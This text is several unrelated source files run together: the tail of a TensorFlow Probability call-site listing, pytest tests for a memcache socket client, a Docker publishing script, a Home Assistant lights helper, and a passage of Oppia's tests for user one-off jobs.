{}), '(df, -1)\n', (5887, 5895), True, 'import tensorflow.compat.v2 as tf\n'), ((6625, 6645), 'tensorflow.compat.v2.TensorShape', 'tf.TensorShape', (['None'], {}), '(None)\n', (6639, 6645), True, 'import tensorflow.compat.v2 as tf\n'), ((10981, 11002), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (11000, 11002), False, 'from tensorflow_probability.python.internal import test_util\n'), ((12613, 12634), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (12632, 12634), False, 'from tensorflow_probability.python.internal import test_util\n'), ((12830, 12841), 'numpy.log', 'np.log', (['(0.5)'], {}), '(0.5)\n', (12836, 12841), True, 'import numpy as np\n'), ((14895, 14914), 'numpy.log', 'np.log', (['(2.0 * np.pi)'], {}), '(2.0 * np.pi)\n', (14901, 14914), True, 'import numpy as np\n'), ((17447, 17461), 'tensorflow.compat.v2.zeros', 'tf.zeros', (['[20]'], {}), '([20])\n', (17455, 17461), True, 'import tensorflow.compat.v2 as tf\n'), ((18586, 18607), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (18605, 18607), False, 'from tensorflow_probability.python.internal import test_util\n'), ((18981, 19002), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (19000, 19002), False, 'from tensorflow_probability.python.internal import test_util\n'), ((19054, 19075), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (19073, 19075), False, 'from tensorflow_probability.python.internal import test_util\n'), ((19480, 19501), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (19499, 19501), False, 'from tensorflow_probability.python.internal import test_util\n'), ((19553, 19574), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (19572, 19574), False, 'from tensorflow_probability.python.internal import test_util\n'), ((20018, 20039), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (20037, 20039), False, 'from tensorflow_probability.python.internal import test_util\n'), ((20082, 20103), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (20101, 20103), False, 'from tensorflow_probability.python.internal import test_util\n'), ((21288, 21334), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {'sampler_type': 'sampler_type'}), '(sampler_type=sampler_type)\n', (21307, 21334), False, 'from tensorflow_probability.python.internal import test_util\n'), ((23369, 23421), 'collections.namedtuple', 'collections.namedtuple', (['"""ModelSpec"""', "['a', 'b', 'c']"], {}), "('ModelSpec', ['a', 'b', 'c'])\n", (23391, 23421), False, 'import collections\n'), ((23570, 23614), 'numpy.ones', 'np.ones', (['[value_partial_batch_dim, num_rows]'], {}), '([value_partial_batch_dim, num_rows])\n', (23577, 23614), True, 'import numpy as np\n'), ((32838, 32859), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (32857, 32859), False, 'from tensorflow_probability.python.internal import test_util\n'), ((33421, 33442), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (33440, 33442), False, 'from tensorflow_probability.python.internal import test_util\n'), ((34935, 34956), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (34954, 34956), False, 'from tensorflow_probability.python.internal import test_util\n'), ((36165, 36188), 'tensorflow.compat.v2.TensorShape', 'tf.TensorShape', (['x.shape'], {}), '(x.shape)\n', (36179, 36188), True, 'import tensorflow.compat.v2 as tf\n'), ((36295, 36316), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (36314, 36316), False, 'from tensorflow_probability.python.internal import test_util\n'), ((37108, 37134), 'tensorflow.compat.v2.test.is_gpu_available', 'tf.test.is_gpu_available', ([], {}), '()\n', (37132, 37134), True, 'import tensorflow.compat.v2 as tf\n'), ((38306, 38323), 'tensorflow.compat.v2.zeros', 'tf.zeros', (['[nsamp]'], {}), '([nsamp])\n', (38314, 38323), True, 'import tensorflow.compat.v2 as tf\n'), ((39220, 39265), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {'sampler_type': '"""stateless"""'}), "(sampler_type='stateless')\n", (39239, 39265), False, 'from tensorflow_probability.python.internal import test_util\n'), ((12866, 12928), 'tensorflow.compat.v2.math.log', 'tf.math.log', (['(b * (0.25 + 0.5 * a) + (1 - b) * (0.75 - 0.5 * a))'], {}), '(b * (0.25 + 0.5 * a) + (1 - b) * (0.75 - 0.5 * a))\n', (12877, 12928), True, 'import tensorflow.compat.v2 as tf\n'), ((13092, 13112), 'tensorflow.compat.v2.math.log', 'tf.math.log', (['(1.0 + b)'], {}), '(1.0 + b)\n', (13103, 13112), True, 'import tensorflow.compat.v2 as tf\n'), ((14732, 14743), 'numpy.log', 'np.log', (['(0.5)'], {}), '(0.5)\n', (14738, 14743), True, 'import numpy as np\n'), ((14754, 14816), 'tensorflow.compat.v2.math.log', 'tf.math.log', (['(b * (0.25 + 0.5 * a) + (1 - b) * (0.75 - 0.5 * a))'], {}), '(b * (0.25 + 0.5 * a) + (1 - b) * (0.75 - 0.5 * a))\n', (14765, 14816), True, 'import tensorflow.compat.v2 as tf\n'), ((25303, 25316), 'tensorflow.compat.v2.zeros', 'tf.zeros', (['[3]'], {}), '([3])\n', (25311, 25316), True, 'import tensorflow.compat.v2 as tf\n'), ((25371, 25390), 'tensorflow.compat.v2.einsum', 'tf.einsum', (['"""n->"""', 'x'], {}), "('n->', x)\n", (25380, 25390), True, 'import tensorflow.compat.v2 as tf\n'), ((37340, 37409), 'tensorflow.compat.v2.broadcast_to', 'tf.broadcast_to', (['log_rate[..., tf.newaxis]', '(log_rate.shape + (20000,))'], {}), '(log_rate[..., tf.newaxis], log_rate.shape + (20000,))\n', (37355, 37409), True, 'import tensorflow.compat.v2 as tf\n'), ((2428, 2450), 'tensorflow.compat.v2.expand_dims', 'tf.expand_dims', (['df', '(-1)'], {}), '(df, -1)\n', (2442, 2450), True, 'import tensorflow.compat.v2 as tf\n'), ((4728, 4750), 'tensorflow.compat.v2.expand_dims', 'tf.expand_dims', (['df', '(-1)'], {}), '(df, -1)\n', (4742, 4750), True, 'import tensorflow.compat.v2 as tf\n'), ((9665, 9686), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (9684, 9686), False, 'from tensorflow_probability.python.internal import test_util\n'), ((23998, 24044), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {'sampler_type': 'sampler_type'}), '(sampler_type=sampler_type)\n', (24017, 24044), False, 'from tensorflow_probability.python.internal import test_util\n'), ((24710, 24754), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {'sampler_type': '"""seedless"""'}), "(sampler_type='seedless')\n", (24729, 24754), False, 'from tensorflow_probability.python.internal import test_util\n'), ((24850, 24894), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {'sampler_type': '"""seedless"""'}), "(sampler_type='seedless')\n", (24869, 24894), False, 'from tensorflow_probability.python.internal import test_util\n'), ((24996, 25040), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {'sampler_type': '"""seedless"""'}), "(sampler_type='seedless')\n", (25015, 25040), False, 'from tensorflow_probability.python.internal import test_util\n'), ((26686, 26707), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (26705, 26707), False, 'from tensorflow_probability.python.internal import test_util\n'), ((26970, 26991), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (26989, 26991), False, 'from tensorflow_probability.python.internal import test_util\n'), ((13049, 13068), 'numpy.log', 'np.log', (['(2.0 * np.pi)'], {}), '(2.0 * np.pi)\n', (13055, 13068), True, 'import numpy as np\n'), ((25577, 25598), 'tensorflow_probability.python.internal.test_util.test_seed', 'test_util.test_seed', ([], {}), '()\n', (25596, 25598), False, 'from tensorflow_probability.python.internal import test_util\n'), ((35439, 35460), 'tensorflow.compat.v2.zeros', 'tf.zeros', (['batch_shape'], {}), '(batch_shape)\n', (35447, 35460), True, 'import tensorflow.compat.v2 as tf\n'), ((35495, 35515), 'tensorflow.compat.v2.ones', 'tf.ones', (['batch_shape'], {}), '(batch_shape)\n', (35502, 35515), True, 'import tensorflow.compat.v2 as tf\n')] |
import socket
from typing import Callable, List
import pytest
from pytest_mock import MockerFixture
from meta_memcache.base.memcache_socket import MemcacheSocket
from meta_memcache.errors import MemcacheError
from meta_memcache.protocol import (
Conflict,
Flag,
IntFlag,
Miss,
NotStored,
ServerVersion,
Success,
TokenFlag,
Value,
)
def recv_into_mock(datas: List[bytes]) -> Callable[[memoryview], int]:
def recv_into(buffer: memoryview, length: int = 0, flags: int = 0) -> int:
if not datas:
return -1
data = datas[0]
data_size = len(data)
if length > 0:
buffer_size = length
else:
buffer_size = len(buffer)
if data_size > buffer_size:
read = buffer_size
buffer[:] = data[0:buffer_size]
datas[0] = data[buffer_size:]
else:
read = data_size
buffer[0:data_size] = data
datas.pop(0)
return read
return recv_into
@pytest.fixture
def fake_socket(mocker: MockerFixture) -> socket.socket:
return mocker.MagicMock(spec=socket.socket)
def test_get_response(
fake_socket: socket.socket,
) -> None:
fake_socket.recv_into.side_effect = recv_into_mock(
[b"EN\r\n", b"NF\r\nNS", b"\r\nE", b"X\r\nXX\r\n"]
)
ms = MemcacheSocket(fake_socket)
assert isinstance(ms.get_response(), Miss)
assert isinstance(ms.get_response(), Miss)
assert isinstance(ms.get_response(), NotStored)
assert isinstance(ms.get_response(), Conflict)
try:
ms.get_response()
raise AssertionError("Should not be reached")
except MemcacheError as e:
assert "Error parsing response header" in str(e)
fake_socket.recv_into.side_effect = recv_into_mock(
[b"HD c1\r\nVA 2 c1", b"\r\nOK\r\n"]
)
ms = MemcacheSocket(fake_socket)
result = ms.get_response()
assert isinstance(result, Success)
assert result.int_flags == {IntFlag.RETURNED_CAS_TOKEN: 1}
result = ms.get_response()
assert isinstance(result, Value)
assert result.int_flags == {IntFlag.RETURNED_CAS_TOKEN: 1}
assert result.size == 2
def test_get_response_1_6_6(
fake_socket: socket.socket,
) -> None:
fake_socket.recv_into.side_effect = recv_into_mock(
[b"OK c1\r\nVA 2 c1", b"\r\nOK\r\n"]
)
ms = MemcacheSocket(fake_socket, version=ServerVersion.AWS_1_6_6)
result = ms.get_response()
assert isinstance(result, Success)
assert result.int_flags == {IntFlag.RETURNED_CAS_TOKEN: 1}
result = ms.get_response()
assert isinstance(result, Value)
assert result.int_flags == {IntFlag.RETURNED_CAS_TOKEN: 1}
assert result.size == 2
def test_noreply(
fake_socket: socket.socket,
) -> None:
fake_socket.recv_into.side_effect = recv_into_mock(
[b"EX\r\n", b"MN", b"\r\nHD", b"\r\n"]
)
ms = MemcacheSocket(fake_socket)
ms.sendall(b"test", with_noop=True)
# The first EX should be skipped as it is before the No-op
# response, so this should be a success:
assert isinstance(ms.get_response(), Success)
def test_get_value(
fake_socket: socket.socket,
) -> None:
fake_socket.recv_into.side_effect = recv_into_mock([b"VA 2 c1\r\nOK\r\n"])
ms = MemcacheSocket(fake_socket)
result = ms.get_response()
assert isinstance(result, Value)
assert result.int_flags == {IntFlag.RETURNED_CAS_TOKEN: 1}
assert result.size == 2
ms.get_value(2)
def test_get_value_large(
fake_socket: socket.socket,
) -> None:
fake_socket.recv_into.side_effect = recv_into_mock(
[b"VA 200 c1 Oxxx W Q Qa \r\n", b"1234567890", b"1234567890" * 19 + b"\r\n"],
)
ms = MemcacheSocket(fake_socket, buffer_size=100)
result = ms.get_response()
assert isinstance(result, Value)
assert result.int_flags == {IntFlag.RETURNED_CAS_TOKEN: 1}
assert result.flags == set([Flag.WIN])
assert result.token_flags == {TokenFlag.OPAQUE: b"xxx"}
assert result.size == 200
value = ms.get_value(result.size)
assert len(value) == result.size
assert value == b"1234567890" * 20
def test_get_value_with_incomplete_endl(
fake_socket: socket.socket,
) -> None:
data = b"VA 10\r\n1234567890\r\n"
fake_socket.recv_into.side_effect = recv_into_mock([data])
ms = MemcacheSocket(fake_socket, buffer_size=len(data) - 1)
result = ms.get_response()
assert isinstance(result, Value)
assert result.size == 10
value = ms.get_value(result.size)
assert len(value) == result.size
assert value == b"1234567890"
fake_socket.recv_into.side_effect = recv_into_mock([data])
ms = MemcacheSocket(fake_socket, buffer_size=len(data) - 2)
result = ms.get_response()
assert isinstance(result, Value)
assert result.size == 10
value = ms.get_value(result.size)
assert len(value) == result.size
assert value == b"1234567890"
def test_bad(
fake_socket: socket.socket,
) -> None:
fake_socket.recv_into.side_effect = recv_into_mock(
[b"VA 10 c1\r\n", b"1234567890XX"]
)
ms = MemcacheSocket(fake_socket, buffer_size=100)
result = ms.get_response()
try:
ms.get_value(result.size)
raise AssertionError("Should not be reached")
except MemcacheError as e:
assert "Error parsing value" in str(e)
fake_socket.recv_into.side_effect = recv_into_mock(
[b"VA 200 c1\r\n", b"1234567890", b"1234567890" * 19 + b"XX"],
)
ms = MemcacheSocket(fake_socket, buffer_size=100)
result = ms.get_response()
try:
ms.get_value(result.size)
raise AssertionError("Should not be reached")
except MemcacheError as e:
assert "Error parsing value" in str(e)
fake_socket.recv_into.side_effect = recv_into_mock([b"VA 10 c1", b"XX"])
ms = MemcacheSocket(fake_socket, buffer_size=100)
try:
ms.get_response()
raise AssertionError("Should not be reached")
except MemcacheError as e:
assert "Bad response" in str(e)
def test_reset_buffer(
fake_socket: socket.socket,
) -> None:
data = b"VA 50 \r\n" + (b"1234567890" * 5) + b"\r\n"
fake_socket.recv_into.side_effect = recv_into_mock([data])
ms = MemcacheSocket(fake_socket, buffer_size=len(data) - 1)
result = ms.get_response()
value = ms.get_value(result.size)
assert len(value) == result.size
assert value == b"1234567890" * 5
ms._reset_buffer()
assert ms._pos == 0
data = (b"VA 50 \r\n" + (b"1234567890" * 5) + b"\r\n") * 2
fake_socket.recv_into.side_effect = recv_into_mock([data])
ms = MemcacheSocket(fake_socket, buffer_size=len(data) - 10)
result = ms.get_response()
value = ms.get_value(result.size)
assert len(value) == result.size
assert value == b"1234567890" * 5
ms._reset_buffer()
assert ms._pos == len(data) // 2
result = ms.get_response()
value = ms.get_value(result.size)
assert len(value) == result.size
assert value == b"1234567890" * 5
ms._reset_buffer()
assert ms._pos == 0
def test_close(
fake_socket: socket.socket,
) -> None:
ms = MemcacheSocket(fake_socket, buffer_size=100)
ms.close()
fake_socket.close.assert_called_once()
| [
"meta_memcache.base.memcache_socket.MemcacheSocket"
] | [((1351, 1378), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {}), '(fake_socket)\n', (1365, 1378), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n'), ((1870, 1897), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {}), '(fake_socket)\n', (1884, 1897), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n'), ((2381, 2441), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {'version': 'ServerVersion.AWS_1_6_6'}), '(fake_socket, version=ServerVersion.AWS_1_6_6)\n', (2395, 2441), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n'), ((2916, 2943), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {}), '(fake_socket)\n', (2930, 2943), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n'), ((3295, 3322), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {}), '(fake_socket)\n', (3309, 3322), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n'), ((3732, 3776), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {'buffer_size': '(100)'}), '(fake_socket, buffer_size=100)\n', (3746, 3776), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n'), ((5119, 5163), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {'buffer_size': '(100)'}), '(fake_socket, buffer_size=100)\n', (5133, 5163), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n'), ((5513, 5557), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {'buffer_size': '(100)'}), '(fake_socket, buffer_size=100)\n', (5527, 5557), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n'), ((5851, 5895), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {'buffer_size': '(100)'}), '(fake_socket, buffer_size=100)\n', (5865, 5895), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n'), ((7156, 7200), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {'buffer_size': '(100)'}), '(fake_socket, buffer_size=100)\n', (7170, 7200), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n')] |
# encoding=utf-8
import sys
import string
import getopt
import pubproxy
import filter
def main(argv):
deploy_channel = None
docker_envs = []
node = None
container_name = None
docker_image = None
volumes = []
net = 'bridge' # 默认网络模式
ports = []
mode = 'default' # default or swarm
compose_file = None
stack_name = None
usage = 'Usage: main.py --deploy_channel=DEV \
--docker_env="ASPNETCORE_ENVIRONMENT=Development" \
--docker_env="ASPNETCORE_ENDPOINT=192.168.8.11" \
--node=1 \
--container_name=cs-trader-grpc-srv \
--docker_image=cs-trader-grpc-srv:v3.1.8.180717091123 \
--net=host \
--v=source:target \
--port=8585:80'
try:
opts, args = getopt.getopt(argv,
'c:n:cn:i:p:e:m:f:v',
['deploy_channel=', 'channel=', 'docker_env=', 'env=', 'node=', 'container_name=', 'docker_image=', 'image=', 'net=', 'port=', 'mode=', 'file=', 'stack=', 'volume='])
except getopt.GetoptError as er:
print(er)
print(usage)
sys.exit(2)
for opt, arg in opts:
if opt in ('-c', '--deploy_channel', '--channel'):
deploy_channel = arg
elif opt in ('-n', '--node'):
node = arg
elif opt in ('-cn', '--container_name'):
container_name = arg
elif opt in('-i', '--docker_image', '--image'):
docker_image = arg
elif opt in('--net'):
net = arg
elif opt in('-p', '--port'):
ports.append(arg)
elif opt in('-e', '--docker_env', '--env'):
docker_envs.append(str.strip(arg))
elif opt in('-m', '--mode'):
mode = arg
elif opt in('-f', '--file'):
compose_file = arg
elif opt in('--stack'):
stack_name = arg
elif opt in('-v', '--volume'):
volumes.append(str.strip(arg))
#filter the prod pub list
if deploy_channel.lower() == 'prod':
filter.filter(container=container_name, stack_compose=compose_file)
proxy = pubproxy.PubProxy(
deploy_channel, node, container_name, docker_image, net, ports, volumes, docker_envs, mode, compose_file, stack_name)
if(mode == 'swarm'):
proxy.publish_stack()
else:
proxy.publish_container()
if __name__ == '__main__':
main(sys.argv[1:])
| [
"getopt.getopt",
"filter.filter",
"sys.exit",
"pubproxy.PubProxy"
] | [((2207, 2346), 'pubproxy.PubProxy', 'pubproxy.PubProxy', (['deploy_channel', 'node', 'container_name', 'docker_image', 'net', 'ports', 'volumes', 'docker_envs', 'mode', 'compose_file', 'stack_name'], {}), '(deploy_channel, node, container_name, docker_image, net,\n ports, volumes, docker_envs, mode, compose_file, stack_name)\n', (2224, 2346), False, 'import pubproxy\n'), ((831, 1047), 'getopt.getopt', 'getopt.getopt', (['argv', '"""c:n:cn:i:p:e:m:f:v"""', "['deploy_channel=', 'channel=', 'docker_env=', 'env=', 'node=',\n 'container_name=', 'docker_image=', 'image=', 'net=', 'port=', 'mode=',\n 'file=', 'stack=', 'volume=']"], {}), "(argv, 'c:n:cn:i:p:e:m:f:v', ['deploy_channel=', 'channel=',\n 'docker_env=', 'env=', 'node=', 'container_name=', 'docker_image=',\n 'image=', 'net=', 'port=', 'mode=', 'file=', 'stack=', 'volume='])\n", (844, 1047), False, 'import getopt\n'), ((2126, 2193), 'filter.filter', 'filter.filter', ([], {'container': 'container_name', 'stack_compose': 'compose_file'}), '(container=container_name, stack_compose=compose_file)\n', (2139, 2193), False, 'import filter\n'), ((1195, 1206), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (1203, 1206), False, 'import sys\n')] |
from __future__ import annotations
from custom_components.magic_lights.const import DOMAIN
from custom_components.magic_lights.magicbase.share import get_magic
import logging
from typing import TYPE_CHECKING
from homeassistant.core import Context
_LOGGER = logging.getLogger(__name__)
if TYPE_CHECKING:
from custom_components.magic_lights.data_structures.living_space import Pipe, Zone
def create_async_call(pipe: Pipe) -> callable:
async def async_call(domain: str, service: str, service_data: dict):
for modifier in pipe.modifiers:
domain, service, service_data = modifier.update(
domain, service, service_data
)
if disabled_entity(pipe, service_data):
return
return await async_call_service(domain, service, service_data)
return async_call
def disabled_entity(pipe: Pipe, service_data: dict) -> bool:
if "entity_id" in service_data:
if service_data["entity_id"] in pipe.scene.zone.disabled_entities:
_LOGGER.debug(
"Entity %s disabled... skipping update.", service_data["entity_id"]
)
return True
return False
async def async_call_service(domain: str, service: str, service_data: dict):
_LOGGER.debug("Updating state: %s", service_data)
context = Context(None, DOMAIN)
magic = get_magic()
return await magic.hass.services.async_call(
domain, service, service_data, context=context
)
| [
"logging.getLogger",
"custom_components.magic_lights.magicbase.share.get_magic",
"homeassistant.core.Context"
] | [((259, 286), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (276, 286), False, 'import logging\n'), ((1327, 1348), 'homeassistant.core.Context', 'Context', (['None', 'DOMAIN'], {}), '(None, DOMAIN)\n', (1334, 1348), False, 'from homeassistant.core import Context\n'), ((1362, 1373), 'custom_components.magic_lights.magicbase.share.get_magic', 'get_magic', ([], {}), '()\n', (1371, 1373), False, 'from custom_components.magic_lights.magicbase.share import get_magic\n')] |
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for user-related one-off computations."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import ast
import datetime
import re
from core.domain import collection_domain
from core.domain import collection_services
from core.domain import event_services
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import feedback_services
from core.domain import learner_progress_services
from core.domain import rating_services
from core.domain import rights_domain
from core.domain import rights_manager
from core.domain import subscription_services
from core.domain import taskqueue_services
from core.domain import user_jobs_continuous
from core.domain import user_jobs_one_off
from core.domain import user_services
from core.platform import models
from core.tests import test_utils
from core.tests.data import image_constants
import feconf
import python_utils
import utils
auth_models, user_models, feedback_models, exp_models = (
models.Registry.import_models(
[models.NAMES.auth, models.NAMES.user, models.NAMES.feedback,
models.NAMES.exploration]))
datastore_services = models.Registry.import_datastore_services()
search_services = models.Registry.import_search_services()
class UserContributionsOneOffJobTests(test_utils.GenericTestBase):
"""Tests for the one-off dashboard subscriptions job."""
EXP_ID_1 = 'exp_id_1'
EXP_ID_2 = 'exp_id_2'
USER_A_EMAIL = '<EMAIL>'
USER_A_USERNAME = 'a'
USER_B_EMAIL = '<EMAIL>'
USER_B_USERNAME = 'b'
USER_C_EMAIL = '<EMAIL>'
USER_C_USERNAME = 'c'
USER_D_EMAIL = '<EMAIL>'
USER_D_USERNAME = 'd'
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = user_jobs_one_off.UserContributionsOneOffJob.create_new()
user_jobs_one_off.UserContributionsOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
def setUp(self):
super(UserContributionsOneOffJobTests, self).setUp()
# User A has no created or edited explorations.
# User B has one created exploration.
# User C has one edited exploration.
# User D has created an exploration and then edited it.
# (This is used to check that there are no duplicate
# entries in the contribution lists).
self.signup(self.USER_A_EMAIL, self.USER_A_USERNAME)
self.user_a_id = self.get_user_id_from_email(self.USER_A_EMAIL)
self.signup(self.USER_B_EMAIL, self.USER_B_USERNAME)
self.user_b_id = self.get_user_id_from_email(self.USER_B_EMAIL)
self.signup(self.USER_C_EMAIL, self.USER_C_USERNAME)
self.user_c_id = self.get_user_id_from_email(self.USER_C_EMAIL)
self.signup(self.USER_D_EMAIL, self.USER_D_USERNAME)
self.user_d_id = self.get_user_id_from_email(self.USER_D_EMAIL)
self.save_new_valid_exploration(
self.EXP_ID_1, self.user_b_id, end_state_name='End')
exp_services.update_exploration(
self.user_c_id, self.EXP_ID_1, [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'objective',
'new_value': 'the objective'
})], 'Test edit')
self.save_new_valid_exploration(
self.EXP_ID_2, self.user_d_id, end_state_name='End')
exp_services.update_exploration(
self.user_d_id, self.EXP_ID_2, [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'objective',
'new_value': 'the objective'
})], 'Test edit')
def test_null_case(self):
"""Tests the case where user has no created or edited explorations."""
self._run_one_off_job()
user_a_contributions_model = user_models.UserContributionsModel.get(
self.user_a_id, strict=False)
self.assertEqual(user_a_contributions_model.created_exploration_ids, [])
self.assertEqual(user_a_contributions_model.edited_exploration_ids, [])
def test_created_exp(self):
"""Tests the case where user has created (and therefore edited)
an exploration.
"""
self._run_one_off_job()
user_b_contributions_model = user_models.UserContributionsModel.get(
self.user_b_id)
self.assertEqual(
user_b_contributions_model.created_exploration_ids, [self.EXP_ID_1])
self.assertEqual(
user_b_contributions_model.edited_exploration_ids, [self.EXP_ID_1])
def test_edited_exp(self):
"""Tests the case where user has an edited exploration."""
self._run_one_off_job()
user_c_contributions_model = user_models.UserContributionsModel.get(
self.user_c_id)
self.assertEqual(
user_c_contributions_model.created_exploration_ids, [])
self.assertEqual(
user_c_contributions_model.edited_exploration_ids, [self.EXP_ID_1])
def test_for_duplicates(self):
"""Tests the case where user has an edited exploration, and edits
it again making sure it is not duplicated.
"""
self._run_one_off_job()
user_d_contributions_model = user_models.UserContributionsModel.get(
self.user_d_id)
self.assertEqual(
user_d_contributions_model.edited_exploration_ids,
[self.EXP_ID_2])
self.assertEqual(
user_d_contributions_model.created_exploration_ids,
[self.EXP_ID_2])
def test_no_new_user_contributions_model_get_created_with_existing_model(
self):
model1 = exp_models.ExplorationSnapshotMetadataModel(
id='exp_id-1', committer_id=self.user_a_id, commit_type='create')
model1.update_timestamps()
model1.put()
user_models.UserContributionsModel(
id=self.user_a_id,
created_exploration_ids=['exp_id']
).put()
user_contributions_model = user_models.UserContributionsModel.get(
self.user_a_id)
self.assertEqual(
user_contributions_model.created_exploration_ids,
['exp_id'])
self._run_one_off_job()
user_contributions_model = user_models.UserContributionsModel.get(
self.user_a_id)
self.assertEqual(
user_contributions_model.created_exploration_ids,
['exp_id'])
def test_user_contributions_get_created_after_running_the_job(self):
model1 = exp_models.ExplorationSnapshotMetadataModel(
id='exp_id-1', committer_id='new_user', commit_type='create')
model1.update_timestamps()
model1.put()
user_contributions_model = user_models.UserContributionsModel.get(
'new_user', strict=False)
self.assertIsNone(user_contributions_model)
self._run_one_off_job()
user_contributions_model = user_models.UserContributionsModel.get(
'new_user', strict=False)
self.assertEqual(
user_contributions_model.created_exploration_ids,
['exp_id'])
class UsernameLengthDistributionOneOffJobTests(test_utils.GenericTestBase):
"""Tests for the one-off username length distribution job."""
USER_A_EMAIL = '<EMAIL>'
USER_A_USERNAME = 'a'
USER_B_EMAIL = '<EMAIL>'
USER_B_USERNAME = 'ab'
USER_C_EMAIL = '<EMAIL>'
USER_C_USERNAME = 'bc'
USER_D_EMAIL = '<EMAIL>'
USER_D_USERNAME = 'bcd'
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = (
user_jobs_one_off.UsernameLengthDistributionOneOffJob.create_new())
user_jobs_one_off.UsernameLengthDistributionOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
stringified_output = (
user_jobs_one_off.UsernameLengthDistributionOneOffJob.get_output(
job_id))
output = {}
for stringified_distribution in stringified_output:
value = re.findall(r'\d+', stringified_distribution)
# The following is output['username length'] = number of users.
output[value[0]] = int(value[1])
return output
def test_null_case(self):
"""Tests the case when there are no signed up users but there is one
default user having the username - 'tmpsuperadm1n'.
"""
output = self._run_one_off_job()
# Number of users = 1.
# length of usernames = 13 (tmpsuperadm1n).
self.assertEqual(output['13'], 1)
def test_single_user_case(self):
"""Tests the case when there is only one signed up user and a default
user - 'tmpsuperadm1n'.
"""
self.signup(self.USER_A_EMAIL, self.USER_A_USERNAME)
output = self._run_one_off_job()
# Number of users = 2.
# length of usernames = 13 (tmpsuperadm1n), 1 (a).
self.assertEqual(output['13'], 1)
self.assertEqual(output['1'], 1)
def test_multiple_users_case(self):
"""Tests the case when there are multiple signed up users and a
default user - 'tmpsuperadm1n'.
"""
self.signup(self.USER_A_EMAIL, self.USER_A_USERNAME)
self.signup(self.USER_B_EMAIL, self.USER_B_USERNAME)
output = self._run_one_off_job()
# Number of users = 3
# length of usernames = 13 (tmpsuperadm1n), 2 (ab), 1 (a).
